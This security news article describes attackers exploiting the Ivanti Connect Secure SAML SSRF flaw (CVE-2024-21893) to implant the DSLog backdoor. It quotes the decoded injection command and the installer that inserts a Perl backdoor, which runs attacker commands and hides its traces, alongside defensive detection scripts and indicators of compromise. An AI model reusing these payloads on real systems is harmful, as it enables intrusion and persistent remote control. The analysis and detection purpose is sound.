Hackers Inject DSLog Malware to 670 Devices Using Ivanti SSRF Flaw Exploit

by Esmeralda McKenzie

Hackers Exploiting Ivanti SSRF Flaw to Inject DSLog Malware

Ivanti Connect Secure was previously found to have yet another SSRF vulnerability, caused by a flaw in its SAML module, that could allow unauthenticated threat actors to reach resources that should be restricted. The vulnerability was assigned CVE-2024-21893 with a severity of 8.2 (High).

This vulnerability had already been reported as exploited in the wild at the time of disclosure. However, recent reports state that threat actors have since leveraged it to install a previously unknown "DSLog backdoor" on vulnerable devices.

Orange Cyberdefense detected 670 compromised assets into which attackers had injected the backdoor using the SAML vulnerability. The backdoor gave the attacker persistent remote access.


Hackers Exploiting Ivanti SSRF Flaw

According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices, which threat actors exploit to plant a backdoor through command injection. The backdoor is then accessed and controlled through a simple "API key" mechanism.

Initial request

During the initial phase of the attack, the threat actors send an unauthenticated SAML authentication request containing an encoded command in the "RetrievalMethod URI". The request was found to be URL-encoded and to carry a base64-encoded command alongside the URI.

URL-decoding and then base64-decoding the request yields the following command line used by the threat actors for exploitation.

http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname -a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;

This command gathers internal reconnaissance information and writes it to a file named "index2.txt" using the 'echo' command-line tool. The encoded string is decoded with the base64 utility and handed to the bash interpreter.
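The decoding steps just described, as an added example in Python (this is not code from the article or from Orange Cyberdefense): URL-decode the SAML form body, pull the URI out of the RetrievalMethod element, base64-decode the stage that follows ";echo", and flag the indicators the decoded command line contains. The SAML body is constructed here; its inner base64 stage is the article's own decoded reconnaissance command, and `triage`, `INDICATORS` and the other names are this example's own.

```python
"""Triage a captured SAML request for the CVE-2024-21893 command-injection pattern.

Added example, not the article's or Orange Cyberdefense's code. It mirrors the
two decoding layers the article describes (URL encoding around the XML, base64
inside the RetrievalMethod URI) and reports which indicators the result contains.
"""
import base64
import re
import urllib.parse

# Substrings of the decoded command line quoted in the article. Any of them
# inside a RetrievalMethod URI is reason enough to open an incident.
INDICATORS = (
    "127.0.0.1:8090",
    "/api/v1/license/keys-status/",
    "/usr/bin/base64 -d",
    "/bin/bash",
    "/dana-na/imgs/",
)

_URI_RE = re.compile(r'RetrievalMethod[^>]*\bURI="([^"]*)"')
_B64_RE = re.compile(r";echo\s+([A-Za-z0-9+/=]{8,})")


def extract_retrieval_uri(form_body: str) -> str:
    """URL-decode the POST body and return the RetrievalMethod URI, or ''."""
    xml = urllib.parse.unquote_plus(form_body)
    m = _URI_RE.search(xml)
    return m.group(1) if m else ""


def expand_base64_stage(uri: str) -> str:
    """Replace the base64 token after ';echo' with its decoded text, i.e. show
    what '| /usr/bin/base64 -d | /bin/bash' would feed to the shell."""
    def _decode(m):
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)          # not valid base64: leave the token alone
        return ";echo " + inner
    return _B64_RE.sub(_decode, uri)


def triage(form_body: str) -> dict:
    """Decode a captured request and list the indicators found in it."""
    uri = extract_retrieval_uri(form_body)
    command = expand_base64_stage(uri) if uri else ""
    return {
        "uri": uri,
        "decoded_command": command,
        "indicators": [i for i in INDICATORS if i in command],
    }


# Constructed sample request: the article's decoded command, re-encoded the
# way the article says it arrived (base64 inside the URI, URL-encoded XML).
INNER_COMMAND = "echo $(uname -a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt"
_URI = ("http://127.0.0.1:8090/api/v1/license/keys-status/;echo "
        + base64.b64encode(INNER_COMMAND.encode()).decode()
        + "| /usr/bin/base64 -d | /bin/bash;")
_XML = ('<ds:Signature><ds:KeyInfo><ds:RetrievalMethod URI="' + _URI
        + '"/></ds:KeyInfo></ds:Signature>')
SAMPLE_REQUEST = "SAMLRequest=" + urllib.parse.quote_plus(_XML)

if __name__ == "__main__":
    result = triage(SAMPLE_REQUEST)
    print(result["decoded_command"])
    print("indicators:", result["indicators"])
```

The decoded command is kept in the result rather than only the indicator list so an analyst can read what the payload would actually have run; a legitimate RetrievalMethod URI (a fragment reference such as "#keyinfo") decodes to itself and matches nothing.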

Backdoor Installation

Once the above command has executed successfully, the threat actors attempt to install the backdoor on the vulnerable device using the same URL- and base64-encoding of commands. The request is as follows:

http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw /
DESTFILE="/home/perl/DSLog.pm"
CLFILE="/home/perl/DSLogMB.pm"
if cat $DESTFILE | grep -q 'HTTP_USER_AGENT'; then
echo 'OK';
else
sed -i '102i\ my $ua = $ENV{HTTP_USER_AGENT};\n my $req = $ENV{QUERY_STRING};\n my $qur = "da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7";\n my @param = split(/&/, $req);\n if (index($ua, $qur) != -1) {\n if ($param[1]){\n my @res = split(/=/, $param[1]);\n if ($res[0] eq "cdi"){\n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;\n $res[1] =~ tr/!-~/P-~!-O/;\n system(${res[1]});\n }\n }\n }' $DESTFILE
fi
/bin/touch -r $CLFILE $DESTFILE
rm -rf /var/cores/*
/home/venv3/bin/python3 -c 'import DSMonitor;DSMonitor.warmRestart()'| /usr/bin/base64 -d | /bin/bash;
Decoded backdoor command (Source: Orange Cyberdefense)

This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named "DSLog.pm". DSLog is the module responsible for logging authenticated web requests and system logs on the device.

Orange Cyberdefense provides a complete breakdown of the backdoor, its command execution, the methodologies, and other technical details for readers with a strong technical background.
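Two host-side checks that follow from the decoded command above, as an added example (not code from the article or from Orange Cyberdefense): a content signature for the lines the sed command inserts into DSLog.pm, and a helper that applies the backdoor's own dispatch conditions and decoding (hex, then the Perl tr/!-~/P-~!-O/, which is ROT47) to a logged request so that incident responders can recover what a "cdi" parameter would have executed. The marker strings and the API-key value are taken from the sample above; the function names, the assumption that other samples may use a different key, and the test values are this example's own.

```python
"""Host-side checks for the DSLog.pm backdoor described above.

Added example, not code from the article or from Orange Cyberdefense. Marker
strings come from the sed payload quoted above; everything else is this
example's own.
"""
import re
from typing import Optional

# Fragments the sed command inserts at line 102 of DSLog.pm. A stock logging
# module has no reason to read HTTP_USER_AGENT, ROT47 a query parameter, or
# pass it to system().
INJECTION_MARKERS = (
    "$ENV{HTTP_USER_AGENT}",
    "$ENV{QUERY_STRING}",
    "chr(hex($1))",
    "tr/!-~/P-~!-O/",
    "system(${res[1]})",
)

# "API key" the backdoor expects in the User-Agent header, as quoted in the
# article's sample. Other samples may carry a different value (assumption),
# so the key is a parameter below rather than a hard-coded check.
SAMPLE_API_KEY = "da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7"


def dslog_injection_indicators(perl_source: str) -> list:
    """Return the backdoor markers present in the text of DSLog.pm."""
    return [m for m in INJECTION_MARKERS if m in perl_source]


def rot47(text: str) -> str:
    """Python equivalent of Perl's tr/!-~/P-~!-O/: printable ASCII 33..126
    rotated by 47 positions. The transform is its own inverse."""
    return "".join(
        chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c
        for c in text
    )


def decode_cdi(hex_value: str) -> str:
    """Undo the backdoor's two transforms on the cdi value: hex-decode, then ROT47."""
    return rot47(bytes.fromhex(hex_value).decode("latin-1"))


def recover_command_from_log(user_agent: str, query_string: str,
                             api_key: str = SAMPLE_API_KEY) -> Optional[str]:
    """Apply the backdoor's dispatch conditions (key in User-Agent, second
    '&'-separated parameter named cdi) to a logged request and return the
    command it would have run, or None if the request would not trigger it.
    Only well-formed hex values are handled here."""
    if api_key not in user_agent:
        return None
    params = query_string.split("&")
    if len(params) < 2 or "=" not in params[1]:
        return None
    name, value = params[1].split("=", 1)
    if name != "cdi" or not re.fullmatch(r"[0-9a-fA-F]+", value) or len(value) % 2:
        return None
    return decode_cdi(value)


if __name__ == "__main__":
    # Constructed values: the UA carries the sample key, the cdi value is the
    # hex/ROT47 encoding of "uname -a".
    print(recover_command_from_log("Mozilla/5.0 " + SAMPLE_API_KEY,
                                   "a=1&cdi=463f323e36205c32"))
```

Content inspection matters here because the installer runs "/bin/touch -r $CLFILE $DESTFILE", copying DSLogMB.pm's timestamps onto the modified DSLog.pm, so a modification-time comparison between the two files says nothing. The same goes for the backdoor's grep for HTTP_USER_AGENT: it is the attacker's own idempotency check, and a defender can reuse it as a first-pass signature.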

Indicators of Compromise

Host-based IoC

Path + filename | Hash | Description
/root/home/perl/DSLog[.]pm | N/A – varies | Legitimate DSLog log module embedding the backdoor
/root/home/webserver/htdocs/dana-na/imgs/index[.]txt | N/A – varies |
/root/home/webserver/htdocs/dana-na/imgs/index1[.]txt | N/A – varies | Some appear to be random characters.
/root/home/webserver/htdocs/dana-na/imgs/index2[.]txt | N/A – varies | Some appear to be random characters.
/root/home/webserver/htdocs/dana-na/imgs/mark[.]png | (not given) | Embeds the result of 'uname -a'

Network-based IoC

Network Indicator | Type | Description
159.65.123.122 | IP address | Mass exploitation activity
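A way to put both IoC tables to use against web-server access logs, as an added example (not from the article or from Orange Cyberdefense): each line in the common "combined" log format is parsed and matched against the network IoC and against HTTP requests for the files the host-based table lists under /dana-na/imgs/, since those files sit under the web root and their contents can be read back over HTTP. The IP and file names are the article's; the log lines (with RFC 5737 documentation addresses and a constructed request path for the non-IoC clients), the regex and the function names are this example's own.

```python
"""Scan access logs for the IoCs listed in the article.

Added example, not code from the article or from Orange Cyberdefense.
"""
import re

NETWORK_IOCS = {"159.65.123.122"}

# Files from the host-based IoC table that live under the web root.
DROPPED_FILE_RE = re.compile(r"^/dana-na/imgs/(index[12]?\.txt|mark\.png)$")

# Apache/nginx "combined" log format; only the fields used below are captured.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; the request paths other than the IoC files are placeholders.
SAMPLE_LOG = [
    '159.65.123.122 - - [01/Feb/2024:10:00:00 +0000] "POST /dana-na/auth/welcome.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Feb/2024:10:00:05 +0000] "GET /dana-na/imgs/index2.txt HTTP/1.1" 200 210 "-" "curl/8.4.0"',
    '198.51.100.4 - - [01/Feb/2024:10:01:00 +0000] "GET /dana-na/imgs/logo.png HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


def parse_line(line: str):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = _LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Return one record per matching line, with the reasons it matched."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue                      # unparsable lines are skipped, not failed on
        reasons = []
        if rec["ip"] in NETWORK_IOCS:
            reasons.append("source IP in network IoC list")
        path = rec["path"].split("?", 1)[0]   # ignore any query string
        if DROPPED_FILE_RE.match(path):
            reasons.append("request for attacker-dropped file " + path)
        if reasons:
            hits.append({"line": n, "ip": rec["ip"], "path": path, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Matching on the dropped-file paths is the more durable of the two checks: the IP address is tied to one campaign, whereas any request for index*.txt or mark.png under /dana-na/imgs/ is anomalous on an appliance that never serves those files.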

Source credit : cybersecuritynews.com
